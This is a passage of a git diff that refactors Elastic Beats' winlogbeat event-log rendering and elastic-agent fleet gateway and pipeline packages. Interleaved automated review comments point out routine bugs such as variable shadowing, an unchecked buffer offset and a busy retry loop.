len(values) == 0 { return } @@ -350,7 +351,7 @@ func (r *Renderer) addEventData(evtMeta *eventMetadata, values []interface{}, ev strVal = fmt.Sprintf("%v", v) } - event.EventData.Pairs = append(event.EventData.Pairs, sys.KeyValue{ + event.EventData.Pairs = append(event.EventData.Pairs, winevent.KeyValue{ Key: paramName(i), Value: strVal, }) 
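Review bot: The doc comment on render still tells the caller to `free()` the result, but the function now returns *sys.PooledByteBuffer, whose method is `Free()`, and the sentence is missing words. Suggested wording: `// render uses EvtRender to render the event values. The caller must call Free() on the returned buffer when done accessing the bytes.` The comment should also say that the early `return nil, 0, nil` path hands back a nil buffer, because renderSystem and renderUser then run `defer bb.Free()` on it. The removed byteBuffer.free() tolerated a nil receiver; whether PooledByteBuffer.Free() does is not visible in this diff and is worth confirming.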
@@ -384,8 +385,8 @@ func (r *Renderer) formatMessage(publisherMeta *publisherMetadataStore, // formatMessageFromTemplate creates the message by executing the stored Go // text/template with the event/user data values. func (r *Renderer) formatMessageFromTemplate(msgTmpl *template.Template, values []interface{}) (string, error) { - bb := newByteBuffer() - defer bb.free() + bb := sys.NewPooledByteBuffer() + defer bb.Free() if err := msgTmpl.Execute(bb, values); err != nil { return "", errors.Wrapf(err, "failed to execute template with data=%#v template=%v", values, msgTmpl.Root.String()) @@ -397,7 +398,7 @@ func (r *Renderer) formatMessageFromTemplate(msgTmpl *template.Template, values // enrichRawValuesWithNames adds the names associated with the raw system // property values. It enriches the event with keywords, opcode, level, and // task. The search order is defined in the EvtFormatMessage documentation. -func enrichRawValuesWithNames(publisherMeta *publisherMetadataStore, event *sys.Event) { +func enrichRawValuesWithNames(publisherMeta *publisherMetadataStore, event *winevent.Event) { // Keywords. Each bit in the value can represent a keyword. rawKeyword := int64(event.KeywordsRaw) isClassic := keywordClassic&rawKeyword > 0 diff --git a/winlogbeat/sys/wineventlog/renderer_test.go b/winlogbeat/sys/wineventlog/renderer_test.go index c030686e9ad..4b75ff71168 100644 --- a/winlogbeat/sys/wineventlog/renderer_test.go +++ b/winlogbeat/sys/wineventlog/renderer_test.go @@ -36,7 +36,7 @@ import ( "github.com/elastic/beats/v7/libbeat/common/atomic" "github.com/elastic/beats/v7/libbeat/logp" - "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) func TestRenderer(t *testing.T) { 
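Review bot: The error returned from formatMessageFromTemplate formats the whole `values` slice with `%#v`, so the event/user data of the failing record is copied into the error text and from there into whatever log or report receives the error. Event data can hold command lines or account details, so I would keep the payload out of the message and report only its size, e.g. `errors.Wrapf(err, "failed to execute template with %d values template=%v", len(values), msgTmpl.Root.String())`. If the full values are needed for troubleshooting, a debug-level log at the call site is easier to control. The function body continues past the end of the hunk.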
@@ -166,10 +166,10 @@ func TestTemplateFunc(t *testing.T) { } // renderAllEvents reads all events and renders them. -func renderAllEvents(t *testing.T, log EvtHandle, renderer *Renderer, ignoreMissingMetadataError bool) []*sys.Event { +func renderAllEvents(t *testing.T, log EvtHandle, renderer *Renderer, ignoreMissingMetadataError bool) []*winevent.Event { t.Helper() - var events []*sys.Event + var events []*winevent.Event for { h, done := nextHandle(t, log) if done { diff --git a/winlogbeat/sys/wineventlog/syscall_windows.go b/winlogbeat/sys/wineventlog/syscall_windows.go index 8180ae47521..d64c1a804cf 100644 --- a/winlogbeat/sys/wineventlog/syscall_windows.go +++ b/winlogbeat/sys/wineventlog/syscall_windows.go @@ -25,6 +25,8 @@ import ( "github.com/pkg/errors" "golang.org/x/sys/windows" + + "github.com/elastic/beats/v7/winlogbeat/sys" ) // EvtHandle is a handle to the event log. @@ -439,7 +441,7 @@ func (v EvtVariant) Data(buf []byte) (interface{}, error) { case EvtVarTypeString: addr := unsafe.Pointer(&buf[0]) offset := v.ValueAsUintPtr() - uintptr(addr) - s, err := UTF16BytesToString(buf[offset:]) + s, err := sys.UTF16BytesToString(buf[offset:]) return s, err case EvtVarTypeSByte: return int8(v.ValueAsUint8()), nil diff --git a/winlogbeat/sys/wineventlog/wineventlog_windows.go b/winlogbeat/sys/wineventlog/wineventlog_windows.go index 3b282fd41d7..e0f36680320 100644 --- a/winlogbeat/sys/wineventlog/wineventlog_windows.go +++ b/winlogbeat/sys/wineventlog/wineventlog_windows.go @@ -471,7 +471,7 @@ func readString(buffer []byte, reader io.Reader) (string, error) { } return "", err } - str, _, err := sys.UTF16BytesToString(buffer[offset:]) + str, err := sys.UTF16BytesToString(buffer[offset:]) return str, err } diff --git a/winlogbeat/tests/system/winlogbeat.py b/winlogbeat/tests/system/winlogbeat.py index f10f10f9cb0..38891c32768 100644 --- a/winlogbeat/tests/system/winlogbeat.py +++ b/winlogbeat/tests/system/winlogbeat.py 
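Review bot: In EvtVariant.Data the EvtVarTypeString case computes `offset` by subtracting the address of `buf[0]` from the pointer stored in the variant and then slices `buf[offset:]` without checking the result. An empty `buf` panics on `&buf[0]`, and a stored pointer that does not point into `buf` wraps the uintptr subtraction and panics on the slice, so one malformed variant would stop the reader. Checking `len(buf) == 0` before taking the address and adding `if offset >= uintptr(len(buf)) { return nil, errors.New("string value points outside of buffer") }` before the slice turns both cases into an ordinary error. The switch continues outside the hunk.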
@@ -2,6 +2,7 @@ import os import platform import sys +import time import yaml if sys.platform.startswith("win"): @@ -75,8 +76,17 @@ def write_event_log(self, message, eventID=10, sid=None, if level is None: level = win32evtlog.EVENTLOG_INFORMATION_TYPE - win32evtlogutil.ReportEvent(source, eventID, - eventType=level, strings=[message], sid=sid) + # Retry on exception for up to 10 sec. + t = time.monotonic() + while True: + try: + win32evtlogutil.ReportEvent(source, eventID, + eventType=level, strings=[message], sid=sid) + break + except: + if time.monotonic() - t < 10: + continue + raise def get_sid(self): if self.sid is None: diff --git a/x-pack/elastic-agent/.gitignore b/x-pack/elastic-agent/.gitignore index 81ce70aa69b..cd297650b08 100644 --- a/x-pack/elastic-agent/.gitignore +++ b/x-pack/elastic-agent/.gitignore @@ -7,3 +7,6 @@ pkg/agent/operation/tests/scripts/configurable-1.0-darwin-x86/configurable pkg/agent/operation/tests/scripts/servicable-1.0-darwin-x86/configurable pkg/agent/transpiler/tests/exec-1.0-darwin-x86_64/exec pkg/agent/application/fleet.yml + +# VSCode +/.vscode diff --git a/x-pack/elastic-agent/CHANGELOG.asciidoc b/x-pack/elastic-agent/CHANGELOG.asciidoc index 5c6cd892008..2b67153634f 100644 --- a/x-pack/elastic-agent/CHANGELOG.asciidoc +++ b/x-pack/elastic-agent/CHANGELOG.asciidoc @@ -42,6 +42,7 @@ - Fix capabilities resolution in inspect command {pull}[24346]24346 - Fix windows installer during enroll {pull}[24343]24343 - Logging to file disabled on enroll {issue}[24173]24173 +- Prevent uninstall failures on empty config {pull}[24838]24838 ==== New features diff --git a/x-pack/elastic-agent/CHANGELOG.next.asciidoc b/x-pack/elastic-agent/CHANGELOG.next.asciidoc index 693c8705c63..246ad6b8bc7 100644 --- a/x-pack/elastic-agent/CHANGELOG.next.asciidoc +++ b/x-pack/elastic-agent/CHANGELOG.next.asciidoc 
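Review bot: The retry loop in write_event_log uses a bare `except:` and retries with `continue` and no delay, so for up to ten seconds it spins at full speed and also swallows KeyboardInterrupt and SystemExit. Catching `Exception` and sleeping between attempts keeps the retry without those side effects: `except Exception:` followed by `if time.monotonic() - t < 10: time.sleep(0.1); continue`. Narrowing the handler to the error ReportEvent actually raises would be better still, but that type is not visible in this hunk.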
@@ -44,6 +44,9 @@ - Fix docker enrollment issue related to Fleet Server change. {pull}24155[24155] - Improve log on failure of Endpoint Security installation. {pull}24429[24429] - Verify communication to Kibana before updating Fleet client. {pull}24489[24489] +- Fix nil pointer when null is generated as list item. {issue}23734[23734] +- Add support for filestream input. {pull}24820[24820] +- Add check for URL set when cert and cert key. {pull}24904[24904] ==== New features @@ -77,3 +80,6 @@ - Add TLS support for Fleet Server {pull}24142[24142] - Add support for Fleet Server running under Elastic Agent {pull}24220[24220] - Add CA support to Elastic Agent docker image {pull}24486[24486] +- Add k8s secrets provider for Agent {pull}24789[24789] +- Add STATE_PATH, CONFIG_PATH, LOGS_PATH to Elastic Agent docker image {pull}24817[24817] +- Add status subcommand {pull}24856[24856] diff --git a/x-pack/elastic-agent/fleet.yml.lock b/x-pack/elastic-agent/fleet.yml.lock new file mode 100644 index 00000000000..e69de29bb2d diff --git a/x-pack/elastic-agent/magefile.go b/x-pack/elastic-agent/magefile.go index 2585b7269f2..0ece510c183 100644 --- a/x-pack/elastic-agent/magefile.go +++ b/x-pack/elastic-agent/magefile.go @@ -326,6 +326,9 @@ func Package() { func requiredPackagesPresent(basePath, beat, version string, requiredPackages []string) bool { for _, pkg := range requiredPackages { + if _, ok := os.LookupEnv(snapshotEnv); ok { + version += "-SNAPSHOT" + } packageName := fmt.Sprintf("%s-%s-%s", beat, version, pkg) path := filepath.Join(basePath, "build", "distributions", packageName) diff --git a/x-pack/elastic-agent/pkg/agent/application/application.go b/x-pack/elastic-agent/pkg/agent/application/application.go index a5431c35285..96dcac99dff 100644 --- a/x-pack/elastic-agent/pkg/agent/application/application.go +++ b/x-pack/elastic-agent/pkg/agent/application/application.go 
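Review bot: In requiredPackagesPresent the added `version += "-SNAPSHOT"` sits inside the `for` loop, so when the snapshot variable is set the suffix is appended once per iteration and every package after the first is looked up under a name containing `-SNAPSHOT-SNAPSHOT`. The check does not depend on `pkg`, so it belongs before the loop: `if _, ok := os.LookupEnv(snapshotEnv); ok { version += "-SNAPSHOT" }` placed above `for _, pkg := range requiredPackages {`. The rest of the loop body lies outside the hunk.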
@@ -46,7 +46,7 @@ func New(log *logger.Logger, pathConfigFile string, reexec reexecManager, status return nil, err } - if err := InjectAgentConfig(rawConfig); err != nil { + if err := info.InjectAgentConfig(rawConfig); err != nil { return nil, err } diff --git a/x-pack/elastic-agent/pkg/agent/application/config.go b/x-pack/elastic-agent/pkg/agent/application/config.go index cbb24018d30..eb964d9c019 100644 --- a/x-pack/elastic-agent/pkg/agent/application/config.go +++ b/x-pack/elastic-agent/pkg/agent/application/config.go 
@@ -5,63 +5,10 @@ package application import ( - "github.com/elastic/beats/v7/libbeat/common/transport/tlscommon" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/kibana" ) type localConfig struct { Fleet *configuration.FleetAgentConfig `config:"fleet"` Settings *configuration.SettingsConfig `config:"agent" yaml:"agent"` } - -func createFleetConfigFromEnroll(accessAPIKey string, kbn *kibana.Config) (*configuration.FleetAgentConfig, error) { - cfg := configuration.DefaultFleetAgentConfig() - cfg.Enabled = true - cfg.AccessAPIKey = accessAPIKey - cfg.Kibana = kbn - - if err := cfg.Valid(); err != nil { - return nil, errors.New(err, "invalid enrollment options", errors.TypeConfig) - } - return cfg, nil -} - -func createFleetServerBootstrapConfig(connStr string, policyID string, host string, port uint16, cert string, key string, esCA string) (*configuration.FleetAgentConfig, error) { - es, err := configuration.ElasticsearchFromConnStr(connStr) - if err != nil { - return nil, err - } - if esCA != "" { - es.TLS = &tlscommon.Config{ - CAs: []string{esCA}, - } - } - cfg := configuration.DefaultFleetAgentConfig() - cfg.Enabled = true - cfg.Server = &configuration.FleetServerConfig{ - Bootstrap: true, - Output: configuration.FleetServerOutputConfig{ - Elasticsearch: es, - }, - Host: host, - Port: port, - } - if policyID != "" { - cfg.Server.Policy = &configuration.FleetServerPolicyConfig{ID: policyID} - } - if cert != "" || key != "" { - cfg.Server.TLS = &tlscommon.Config{ - Certificate: tlscommon.CertificateConfig{ - Certificate: cert, - Key: key, - }, - } - } - - if err := cfg.Valid(); err != nil { - return nil, errors.New(err, "invalid enrollment options", errors.TypeConfig) - } - return cfg, nil -} 
diff --git a/x-pack/elastic-agent/pkg/agent/application/config_test.go b/x-pack/elastic-agent/pkg/agent/application/config_test.go index 1a0287e2502..c79edd0adf7 100644 --- a/x-pack/elastic-agent/pkg/agent/application/config_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/config_test.go @@ -5,12 +5,9 @@ package application import ( - "io/ioutil" "testing" "time" - "gopkg.in/yaml.v2" - "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" @@ -77,9 +74,3 @@ func mustWithConfigMode(standalone bool) *config.Config { }, ) } - -func dumpToYAML(t *testing.T, out string, in interface{}) { - b, err := yaml.Marshal(in) - require.NoError(t, err) - ioutil.WriteFile(out, b, 0600) -} diff --git a/x-pack/elastic-agent/pkg/agent/application/filters/stream_checker_test.go b/x-pack/elastic-agent/pkg/agent/application/filters/stream_checker_test.go index 5750734c477..961afb3e147 100644 --- a/x-pack/elastic-agent/pkg/agent/application/filters/stream_checker_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/filters/stream_checker_test.go @@ -16,8 +16,6 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) -const semiLongString = "" - func TestStreamCheck(t *testing.T) { type testCase struct { name string @@ -251,7 +249,7 @@ func TestStreamCheck(t *testing.T) { }, } - log, err := logger.New("") + log, err := logger.New("", false) assert.NoError(t, err) for _, tc := range testCases { diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_server_bootstrap.go b/x-pack/elastic-agent/pkg/agent/application/fleet_server_bootstrap.go index ebdb65ff706..6f3dd09335b 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_server_bootstrap.go +++ b/x-pack/elastic-agent/pkg/agent/application/fleet_server_bootstrap.go 
@@ -13,6 +13,10 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/filters" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/router" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/stream" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/operation" @@ -33,7 +37,7 @@ type FleetServerBootstrap struct { log *logger.Logger Config configuration.FleetAgentConfig agentInfo *info.AgentInfo - router *router + router pipeline.Router source source srv *server.Server } @@ -52,7 +56,7 @@ func newFleetServerBootstrap( } if log == nil { - log, err = logger.NewFromConfig("", cfg.Settings.LoggingConfig) + log, err = logger.NewFromConfig("", cfg.Settings.LoggingConfig, false) if err != nil { return nil, err } @@ -85,7 +89,7 @@ func newFleetServerBootstrap( return nil, errors.New(err, "failed to initialize monitoring") } - router, err := newRouter(log, streamFactory(bootstrapApp.bgContext, agentInfo, cfg.Settings, bootstrapApp.srv, reporter, monitor, statusCtrl)) + router, err := router.New(log, stream.Factory(bootstrapApp.bgContext, agentInfo, cfg.Settings, bootstrapApp.srv, reporter, monitor, statusCtrl)) if err != nil { return nil, errors.New(err, "fail to initialize pipeline router") } 
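Review bot: `router, err := router.New(log, stream.Factory(...))` in newFleetServerBootstrap declares a local variable with the same name as the newly imported `router` package, which hides the package for the rest of the function. It compiles, but any later call into the package from this function would resolve to the variable and fail in a confusing way. A different name avoids that, e.g. `pipelineRouter, err := router.New(...)`, with the `router` argument passed in the following hunk updated to match. bootstrapEmitter and emit also take a parameter called `router`, which shadows the package in the same way.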
@@ -96,8 +100,8 @@ func newFleetServerBootstrap( log, agentInfo, router, - &configModifiers{ - Filters: []filterFunc{filters.StreamChecker, injectFleet(rawConfig, sysInfo.Info(), agentInfo)}, + &pipeline.ConfigModifiers{ + Filters: []pipeline.FilterFunc{filters.StreamChecker, modifiers.InjectFleet(rawConfig, sysInfo.Info(), agentInfo)}, }, ) if err != nil { @@ -138,7 +142,7 @@ func (b *FleetServerBootstrap) AgentInfo() *info.AgentInfo { return b.agentInfo } -func bootstrapEmitter(ctx context.Context, log *logger.Logger, agentInfo transpiler.AgentInfo, router programsDispatcher, modifiers *configModifiers) (emitterFunc, error) { +func bootstrapEmitter(ctx context.Context, log *logger.Logger, agentInfo transpiler.AgentInfo, router pipeline.Router, modifiers *pipeline.ConfigModifiers) (pipeline.EmitterFunc, error) { ch := make(chan *config.Config) go func() { @@ -163,8 +167,8 @@ func bootstrapEmitter(ctx context.Context, log *logger.Logger, agentInfo transpi }, nil } -func emit(log *logger.Logger, agentInfo transpiler.AgentInfo, router programsDispatcher, modifiers *configModifiers, c *config.Config) error { - if err := InjectAgentConfig(c); err != nil { +func emit(log *logger.Logger, agentInfo transpiler.AgentInfo, router pipeline.Router, modifiers *pipeline.ConfigModifiers, c *config.Config) error { + if err := info.InjectAgentConfig(c); err != nil { return err } @@ -202,8 +206,8 @@ func emit(log *logger.Logger, agentInfo transpiler.AgentInfo, router programsDis return errors.New("bootstrap configuration is incorrect causing fleet-server to not be started") } - return router.Dispatch(ast.HashStr(), map[routingKey][]program.Program{ - defautlRK: { + return router.Route(ast.HashStr(), map[pipeline.RoutingKey][]program.Program{ + pipeline.DefaultRK: { { Spec: spec, Config: ast, 
diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway.go b/x-pack/elastic-agent/pkg/agent/application/gateway/fleet/fleet_gateway.go similarity index 86% rename from x-pack/elastic-agent/pkg/agent/application/fleet_gateway.go rename to x-pack/elastic-agent/pkg/agent/application/gateway/fleet/fleet_gateway.go index e0313a2c7f5..10c04ed6069 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway.go +++ b/x-pack/elastic-agent/pkg/agent/application/gateway/fleet/fleet_gateway.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package fleet import ( "context" @@ -11,8 +11,12 @@ import ( "time" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" "github.com/elastic/beats/v7/libbeat/common/backoff" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/gateway" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" @@ -44,12 +48,6 @@ type backoffSettings struct { Max time.Duration `config:"max"` } -type fleetAcker = store.FleetAcker - -type dispatcher interface { - Dispatch(acker fleetAcker, actions ...action) error -} - type agentInfo interface { AgentID() string } 
@@ -58,18 +56,6 @@ type fleetReporter interface { Events() ([]fleetapi.SerializableEvent, func()) } -// FleetGateway is a gateway between the Agent and the Fleet API, it's take cares of all the -// bidirectional communication requirements. The gateway aggregates events and will periodically -// call the API to send the events and will receive actions to be executed locally. -// The only supported action for now is a "ActionPolicyChange". -type FleetGateway interface { - // Start starts the gateway. - Start() error - - // Set the client for the gateway. - SetClient(clienter) -} - type stateStore interface { Add(fleetapi.Action) AckToken() string @@ -81,8 +67,8 @@ type stateStore interface { type fleetGateway struct { bgContext context.Context log *logger.Logger - dispatcher dispatcher - client clienter + dispatcher pipeline.Dispatcher + client client.Sender scheduler scheduler.Scheduler backoff backoff.Backoff settings *fleetGatewaySettings @@ -90,24 +76,25 @@ type fleetGateway struct { reporter fleetReporter done chan struct{} wg sync.WaitGroup - acker fleetAcker + acker store.FleetAcker unauthCounter int statusController status.Controller statusReporter status.Reporter stateStore stateStore } -func newFleetGateway( +// New creates a new fleet gateway +func New( ctx context.Context, log *logger.Logger, agentInfo agentInfo, - client clienter, - d dispatcher, + client client.Sender, + d pipeline.Dispatcher, r fleetReporter, - acker fleetAcker, + acker store.FleetAcker, statusController status.Controller, stateStore stateStore, -) (FleetGateway, error) { +) (gateway.FleetGateway, error) { scheduler := scheduler.NewPeriodicJitter(defaultGatewaySettings.Duration, defaultGatewaySettings.Jitter) return newFleetGatewayWithScheduler( 
@@ -130,14 +117,14 @@ func newFleetGatewayWithScheduler( log *logger.Logger, settings *fleetGatewaySettings, agentInfo agentInfo, - client clienter, - d dispatcher, + client client.Sender, + d pipeline.Dispatcher, scheduler scheduler.Scheduler, r fleetReporter, - acker fleetAcker, + acker store.FleetAcker, statusController status.Controller, stateStore stateStore, -) (FleetGateway, error) { +) (gateway.FleetGateway, error) { // Backoff implementation doesn't support the using context as the shutdown mechanism. // So we keep a done channel that will be closed when the current context is shutdown. @@ -181,7 +168,7 @@ func (f *fleetGateway) worker() { continue } - actions := make([]action, len(resp.Actions)) + actions := make([]fleetapi.Action, len(resp.Actions)) for idx, a := range resp.Actions { actions[idx] = a } @@ -233,7 +220,7 @@ func (f *fleetGateway) execute(ctx context.Context) (*fleetapi.CheckinResponse, // get events ee, ack := f.reporter.Events() - ecsMeta, err := metadata() + ecsMeta, err := info.Metadata() if err != nil { f.log.Error(errors.New("failed to load metadata", err)) } @@ -241,7 +228,7 @@ func (f *fleetGateway) execute(ctx context.Context) (*fleetapi.CheckinResponse, // retrieve ack token from the store ackToken := f.stateStore.AckToken() if ackToken != "" { - f.log.Debug("using previously saved ack token: %v", ackToken) + f.log.Debugf("using previously saved ack token: %v", ackToken) } // checkin @@ -291,7 +278,7 @@ func (f *fleetGateway) shouldUnroll() bool { } func isUnauth(err error) bool { - return errors.Is(err, fleetapi.ErrInvalidAPIKey) + return errors.Is(err, client.ErrInvalidAPIKey) } func (f *fleetGateway) Start() error { @@ -313,6 +300,6 @@ func (f *fleetGateway) stop() { f.wg.Wait() } -func (f *fleetGateway) SetClient(client clienter) { - f.client = client +func (f *fleetGateway) SetClient(c client.Sender) { + f.client = c } 
diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_test.go b/x-pack/elastic-agent/pkg/agent/application/gateway/fleet/fleet_gateway_test.go similarity index 90% rename from x-pack/elastic-agent/pkg/agent/application/fleet_gateway_test.go rename to x-pack/elastic-agent/pkg/agent/application/gateway/fleet/fleet_gateway_test.go index 03381163069..28ffa9dd76e 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/gateway/fleet/fleet_gateway_test.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package fleet import ( "bytes" @@ -20,10 +20,13 @@ import ( "github.com/pkg/errors" "github.com/stretchr/testify/require" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/gateway" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" + noopacker "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/acker/noop" repo "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter" fleetreporter "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter/fleet" fleetreporterConfig "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter/fleet/config" @@ -67,7 +70,7 @@ func newTestingClient() *testingClient { return &testingClient{received: make(chan struct{}, 1)} } -type testingDispatcherFunc func(...action) error +type testingDispatcherFunc func(...fleetapi.Action) error type testingDispatcher struct { sync.Mutex 
@@ -75,7 +78,7 @@ type testingDispatcher struct { received chan struct{} } -func (t *testingDispatcher) Dispatch(acker fleetAcker, actions ...action) error { +func (t *testingDispatcher) Dispatch(acker store.FleetAcker, actions ...fleetapi.Action) error { t.Lock() defer t.Unlock() defer func() { t.received <- struct{}{} }() @@ -107,7 +110,7 @@ func newTestingDispatcher() *testingDispatcher { return &testingDispatcher{received: make(chan struct{}, 1)} } -type withGatewayFunc func(*testing.T, FleetGateway, *testingClient, *testingDispatcher, *scheduler.Stepper, repo.Backend) +type withGatewayFunc func(*testing.T, gateway.FleetGateway, *testingClient, *testingDispatcher, *scheduler.Stepper, repo.Backend) func withGateway(agentInfo agentInfo, settings *fleetGatewaySettings, fn withGatewayFunc) func(t *testing.T) { return func(t *testing.T) { @@ -115,7 +118,7 @@ func withGateway(agentInfo agentInfo, settings *fleetGatewaySettings, fn withGat client := newTestingClient() dispatcher := newTestingDispatcher() - log, _ := logger.New("fleet_gateway") + log, _ := logger.New("fleet_gateway", false) rep := getReporter(agentInfo, log, t) ctx, cancel := context.WithCancel(context.Background()) @@ -133,7 +136,7 @@ func withGateway(agentInfo agentInfo, settings *fleetGatewaySettings, fn withGat dispatcher, scheduler, rep, - newNoopAcker(), + noopacker.NewAcker(), &noopController{}, stateStore, ) @@ -161,7 +164,7 @@ func wrapStrToResp(code int, body string) *http.Response { ProtoMinor: 1, Body: ioutil.NopCloser(bytes.NewBufferString(body)), ContentLength: int64(len(body)), - Header: make(http.Header, 0), + Header: make(http.Header), } } @@ -174,7 +177,7 @@ func TestFleetGateway(t *testing.T) { t.Run("send no event and receive no action", withGateway(agentInfo, settings, func( t *testing.T, - gateway FleetGateway, + gateway gateway.FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, 
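Review bot: The closure parameter `gateway gateway.FleetGateway` in the TestFleetGateway hunk shadows the newly imported `gateway` package for the whole closure body, so the package cannot be referenced there and the name reads ambiguously. The same pattern is introduced in newLocal in local_mode.go (`router, err := router.New(...)`) and in newManaged in managed_mode.go (`client, err := client.NewAuthWithConfig(...)`), where the local hides the package for the rest of the function. Renaming the locals avoids it, e.g. `gw gateway.FleetGateway`, `r, err := router.New(...)` and `c, err := client.NewAuthWithConfig(...)`, which matches what this commit already does in `SetClient(c client.Sender)`. The test closures and both constructors continue outside their hunks.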
@@ -185,7 +188,7 @@ func TestFleetGateway(t *testing.T) { resp := wrapStrToResp(http.StatusOK, `{ "actions": [] }`) return resp, nil }), - dispatcher.Answer(func(actions ...action) error { + dispatcher.Answer(func(actions ...fleetapi.Action) error { require.Equal(t, 0, len(actions)) return nil }), @@ -199,7 +202,7 @@ func TestFleetGateway(t *testing.T) { t.Run("Successfully connects and receives a series of actions", withGateway(agentInfo, settings, func( t *testing.T, - gateway FleetGateway, + gateway gateway.FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, @@ -229,7 +232,7 @@ func TestFleetGateway(t *testing.T) { `) return resp, nil }), - dispatcher.Answer(func(actions ...action) error { + dispatcher.Answer(func(actions ...fleetapi.Action) error { require.Equal(t, 2, len(actions)) return nil }), @@ -249,7 +252,7 @@ func TestFleetGateway(t *testing.T) { ctx, cancel := context.WithCancel(context.Background()) defer cancel() - log, _ := logger.New("tst") + log, _ := logger.New("tst", false) stateStore, err := store.NewStateStore(log, storage.NewDiskStore(paths.AgentStateStoreFile())) require.NoError(t, err) @@ -262,7 +265,7 @@ func TestFleetGateway(t *testing.T) { dispatcher, scheduler, getReporter(agentInfo, log, t), - newNoopAcker(), + noopacker.NewAcker(), &noopController{}, stateStore, ) @@ -274,7 +277,7 @@ func TestFleetGateway(t *testing.T) { resp := wrapStrToResp(http.StatusOK, `{ "actions": [] }`) return resp, nil }), - dispatcher.Answer(func(actions ...action) error { + dispatcher.Answer(func(actions ...fleetapi.Action) error { require.Equal(t, 0, len(actions)) return nil }), @@ -294,7 +297,7 @@ func TestFleetGateway(t *testing.T) { t.Run("send event and receive no action", withGateway(agentInfo, settings, func( t *testing.T, - gateway FleetGateway, + gateway gateway.FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, 
@@ -318,7 +321,7 @@ func TestFleetGateway(t *testing.T) { resp := wrapStrToResp(http.StatusOK, `{ "actions": [] }`) return resp, nil }), - dispatcher.Answer(func(actions ...action) error { + dispatcher.Answer(func(actions ...fleetapi.Action) error { require.Equal(t, 0, len(actions)) return nil }), @@ -339,7 +342,7 @@ func TestFleetGateway(t *testing.T) { dispatcher := newTestingDispatcher() ctx, cancel := context.WithCancel(context.Background()) - log, _ := logger.New("tst") + log, _ := logger.New("tst", false) stateStore, err := store.NewStateStore(log, storage.NewDiskStore(paths.AgentStateStoreFile())) require.NoError(t, err) @@ -356,14 +359,14 @@ func TestFleetGateway(t *testing.T) { dispatcher, scheduler, getReporter(agentInfo, log, t), - newNoopAcker(), + noopacker.NewAcker(), &noopController{}, stateStore, ) require.NoError(t, err) - ch1 := dispatcher.Answer(func(actions ...action) error { return nil }) + ch1 := dispatcher.Answer(func(actions ...fleetapi.Action) error { return nil }) ch2 := client.Answer(func(headers http.Header, body io.Reader) (*http.Response, error) { resp := wrapStrToResp(http.StatusOK, `{ "actions": [] }`) return resp, nil @@ -406,7 +409,7 @@ func TestRetriesOnFailures(t *testing.T) { t.Run("When the gateway fails to communicate with the checkin API we will retry", withGateway(agentInfo, settings, func( t *testing.T, - gateway FleetGateway, + gateway gateway.FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, @@ -447,7 +450,7 @@ func TestRetriesOnFailures(t *testing.T) { return resp, nil }), - dispatcher.Answer(func(actions ...action) error { + dispatcher.Answer(func(actions ...fleetapi.Action) error { require.Equal(t, 0, len(actions)) return nil }), 
